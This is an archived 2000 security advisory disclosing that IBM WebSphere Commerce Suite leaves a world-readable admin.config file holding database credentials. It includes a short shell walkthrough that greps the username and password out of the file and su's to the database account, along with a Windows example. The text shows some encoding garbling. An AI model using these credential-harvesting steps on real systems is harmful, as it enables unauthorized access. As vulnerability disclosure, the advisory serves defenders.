[ SOURCE: http://www.secureroot.com/security/advisories/9786040491.html ] CHINANSL Security Advisory(CSA200013) Topic: IBM WCS local user exceed his authority to access another file Release Date£º Dec 25, 2000 Affected system: ============ IBM WCS(Websphere Commerce Suite) ¡¡¡¡+ Sun OS ¡¡¡¡+ Sun Solaris ¡¡¡¡+ Microsoft Windows NT ¡¡¡¡+ Microsoft Windows 2000 ¡¡¡¡+ HP HP-UX ¡¡¡¡+ IBM AIX ¡¡¡¡+ Linux Impact: ====== CHINANSL security team has found a security problem in IBM WCS. Exploitation of this vulnerability, It is possible that a malicious local user can run arbitrary command to get root right. Description£º ========= IBM WCS is bussiness suite, after install it. A file named admin.config will be produced, The user name and password to access that suite connect database will be include in this file. and this file access right is - rwxr-xr-x, So local user can access it, and run some aibitrary command to get root right. Exploit: ===== Examples for Sun OS 5.7 $find admin.config |grep admin.config /opt/WebSphere/AppServer/bin/admin.config $cd /opt/WebSphere/AppServer/bin/ $grep dbUser admin.config com.ibm.ejs.sm.adminServer.dbUser=db2admin $grep dbPassword admin.config com.ibm.ejs.sm.adminServer.dbUser=ibmdb2 $su - db2admin password:ibmdb2 $id uid=db2adminID(db2admin) Examples for WIN2000: d:\waserver\bin\>more admin.config com.ibm.ejs.sm.adminServer.dbUser=ad2admin com.ibm.ejs.sm.adminServer.dbPassword=ad2admi n ... Workaround: ========= 1¡¢Config this product correctly. Solution: ======= None DISCLAIMS: ======== THE INFORMATION PROVIDED IS RELEASED BY CHINANSL "AS IS" WITHOUT WARRANTY OF ANY KIND. CHINANSL DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL CHINANSL BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF CHINANSL HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY. ?Copyright 2000-2001 CHINANSL. All Rights Reserved. Terms of use. CHINANSL Security Team CHINANSL INFORMATION TECHNOLOGY CO.,LTD (http://www.chinansl.com)